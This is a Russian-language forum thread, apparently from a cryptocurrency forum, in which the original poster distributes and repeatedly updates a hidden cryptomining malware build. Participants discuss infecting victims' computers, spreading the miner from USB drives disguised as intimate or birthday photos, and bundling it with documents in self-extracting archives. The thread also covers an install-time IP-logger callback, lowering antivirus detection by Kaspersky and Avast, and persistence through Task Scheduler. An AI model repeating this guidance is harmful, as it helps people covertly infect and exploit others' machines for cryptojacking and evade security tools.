Chattyspark
Newbie
Activity: 28
Merit: 0
|
|
February 15, 2018, 07:54:43 AM |
|
Ещё забыл сказать, в конце выходит ошибка, что типо он не может установиться в appdat'у, возможно дело в папке, нужно как то исправить
|
|
|
|
likewalk
Newbie
|
|
February 15, 2018, 11:00:54 AM Last edit: February 15, 2018, 11:50:11 AM by likewalk |
|
Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную? Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически? Или антивири сейчас автоматичски режут автозапуск exe с вирусом или без?
|
|
|
|
fredsnikos (OP)
Newbie
Activity: 95
|
|
February 15, 2018, 03:29:47 PM |
|
Ещё забыл сказать, в конце выходит ошибка, что типо он не может установиться в appdat'у, возможно дело в папке, нужно как то исправить
А что за винда? А если запустить от имени администратора?
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 15, 2018, 03:31:23 PM |
|
Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную? Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически? Или антивири сейчас автоматичски режут автозапуск exe с вирусом или без? Он итак прописывается в авторан, но авторан по умолчанию отключён начиная с вин виста, поэтому юзер должен сам увидеть файл ИнтимФото и запустить посмотреть, что ж там за фотки.
|
|
|
|
Chattyspark
Newbie
|
|
February 15, 2018, 04:29:41 PM |
|
Но это старая предпоследняя версия если что, но мне кажется и с новой будут те же проблемы А что за винда? А если запустить от имени администратора? Винда 10, суть в том, я с майнером испытываю дикие проблемы, при его установке, где то при его установке просит пароль, где то просто не даёт доступа, я смог заразить только два компьютера и то, те с прокси, в итоге он мне ничего не майнит, я вот не могу понять, с чем это связано. Я пробовал по всякому, я и антивирус отключал и от сети отключал и от имени администратора запускал, ни в какую. До этого тоже накатил на один комп, в итоге он часок помайнил там копейки и шары просто пропали, мне кажется, если бы пальнул антивирус, он бы сделал это все гораздо раньше, ибо при установке траблов не было.
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 15, 2018, 04:59:37 PM |
|
Винда 10, суть в том, я с майнером испытываю дикие проблемы, при его установке, где то при его установке просит пароль, где то просто не даёт доступа, я смог заразить только два компьютера и то, те с прокси, в итоге он мне ничего не майнит, я вот не могу понять, с чем это связано.
Я пробовал по всякому, я и антивирус отключал и от сети отключал и от имени администратора запускал, ни в какую.
До этого тоже накатил на один комп, в итоге он часок помайнил там копейки и шары просто пропали, мне кажется, если бы пальнул антивирус, он бы сделал это все гораздо раньше, ибо при установке траблов не было.
На вин 10 лицензия могут возникать проблемы. С паролем не должно быть никаких проблем, если всё делаешь по инструкции. На удалённый комп поставил? может просто выключили его или спалили и удалили.
|
|
|
|
likewalk
Newbie
|
|
February 15, 2018, 05:09:24 PM |
|
Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную? Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически? Или антивири сейчас автоматичски режут автозапуск exe с вирусом или без? Он итак прописывается в авторан, но авторан по умолчанию отключён начиная с вин виста, поэтому юзер должен сам увидеть файл ИнтимФото и запустить посмотреть, что ж там за фотки. Может тогда кто подкинет ссылку как запихать в контейнер с файлом doc например, чтобы пользователь открыл мой файл?
|
|
|
|
Chattyspark
Newbie
|
|
February 15, 2018, 05:12:59 PM |
|
Нуб в этих делах, не совсем понятно. Если сделать всё как надо, то при включении флешки в комп жертвы, он автоматически заразится (допустим там нет антивира и тд)? Или мне своими ручками нужно запустить файл, и только потом процесс пойдет? Как заразить изначально флешку так, чтобы мне можно было её просто втыкать и компы заражались?Будет ли всё это работать, если старт тупо прописать в авторан флешки? будет ли детектится? или все-таки нужно запускать всё вручную? Пример. Заражаем свой комп, на флешке появляются ФОТО С ДР. Ставим фото с др в автозапуск. Втыкаем флешку в комп, Фото с др запускаются автоматически? Или антивири сейчас автоматичски режут автозапуск exe с вирусом или без? Он итак прописывается в авторан, но авторан по умолчанию отключён начиная с вин виста, поэтому юзер должен сам увидеть файл ИнтимФото и запустить посмотреть, что ж там за фотки. Может тогда кто подкинет ссылку как запихать в контейнер с файлом doc например, чтобы пользователь открыл мой файл? выделяешь 2 файла добавить в архив, там дальше создаешь непрерывный архив, заблокированный и SFX архив, сжимаешь максимально, потом изучай параметры SFX, там как раз то, что тебе нужно, что открыть первым, скрыть или нет и тд.
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 16, 2018, 10:58:10 AM |
|
Сборка обновлена. Снижен детект Были проблемы с minergate, теперь всё корректно. Добавлен iplogger(пишим его в iplog.cnf, работает только с http!, отстукивается только при установке, также сможете увидеть видеокарту в строке "Идентификатор устройства:") Новые ссылки: Зеркало 1Зеркало 2Версия без вывода консольного окна с ошибкой(Кому нужно для склейки) Зеркало 1Зеркало 2В первом сообщении ссылки также обновлены.
|
|
|
|
likewalk
Newbie
|
|
February 16, 2018, 12:37:37 PM |
|
ОП, ты итак много работы сделал конечно, но не мог бы подсказать по шагам, как с логером управится?
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 16, 2018, 06:36:51 PM |
|
ОП, ты итак много работы сделал конечно, но не мог бы подсказать по шагам, как с логером управится?
Создай логгер тут https://iplogger.org/Только укажи http при создании, а не https Там получишь ссылку, вставь её в iplog.cnf
|
|
|
|
GVG
Newbie
Activity: 2
|
|
February 17, 2018, 11:36:26 AM |
|
не работает. при запуске файла Start пишет
ErrorОшибка при открытии архива. Возможные причины: - требуется запуск от имени администратора. - антивирус блокирует файловую систему
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 17, 2018, 11:59:01 AM |
|
не работает. при запуске файла Start пишет
ErrorОшибка при открытии архива. Возможные причины: - требуется запуск от имени администратора. - антивирус блокирует файловую систему
Всё правильно. Если не нужно пользователю ничего выводить, то берите вторую версию, без окна.
|
|
|
|
Chattyspark
Newbie
|
|
February 18, 2018, 06:10:07 PM |
|
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится. Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится. http://rgho.st/858g4BqnT BTC
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 19, 2018, 02:59:53 AM |
|
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится. Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится. http://rgho.st/858g4BqnT BTCВ чём он палится? В чём отличия?
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 19, 2018, 06:11:47 AM Last edit: February 20, 2018, 08:26:18 AM by fredsnikos |
|
Сборка обновлена. Снижен детект Новые ссылки: Зеркало 1Зеркало 2Версия без вывода консольного окна с ошибкой(Кому нужно для склейки) Зеркало 1Зеркало 2В первом сообщении ссылки также обновлены.
|
|
|
|
Chattyspark
Newbie
|
|
February 19, 2018, 07:17:57 PM |
|
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится. Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится. http://rgho.st/858g4BqnT BTCВ чём он палится? В чём отличия? он прописывается в сценарий автозапуска, при этом полностью не палится
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 20, 2018, 03:14:41 AM |
|
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится. Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится. http://rgho.st/858g4BqnT BTCВ чём он палится? В чём отличия? он прописывается в сценарий автозапуска, при этом полностью не палится Имеешь ввиду планировщик заданий, чтобы в автозагрузке ничего не было? Тогда могут быть проблемы с правами.
|
|
|
|
Chattyspark
Newbie
|
|
February 20, 2018, 07:32:54 AM |
|
бро, вообщем, у меня получилось раздобыть вроде как приват майнер, суть в том, что он вообще не палится. Я тебе это говорю в целях улучшения майнера, потому что мне кажется, что у жертвы он быстро палится. http://rgho.st/858g4BqnT BTCВ чём он палится? В чём отличия? он прописывается в сценарий автозапуска, при этом полностью не палится Имеешь ввиду планировщик заданий, чтобы в автозагрузке ничего не было? Тогда могут быть проблемы с правами. Я говорю, его, когда его ставишь, он прописывается в планировщик, так же я заметил, что его Аваст вообще не палит
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 22, 2018, 04:12:15 PM |
|
Сборка обновлена. Снижен детект. Пришлось убрать iplogger из-за которого срабатывал эвристический анализ каспера Новые ссылки: Зеркало 1Зеркало 2Версия без вывода консольного окна с ошибкой(Кому нужно для склейки) Зеркало 1Зеркало 2В первом сообщении ссылки также обновлены.
|
|
|
|
|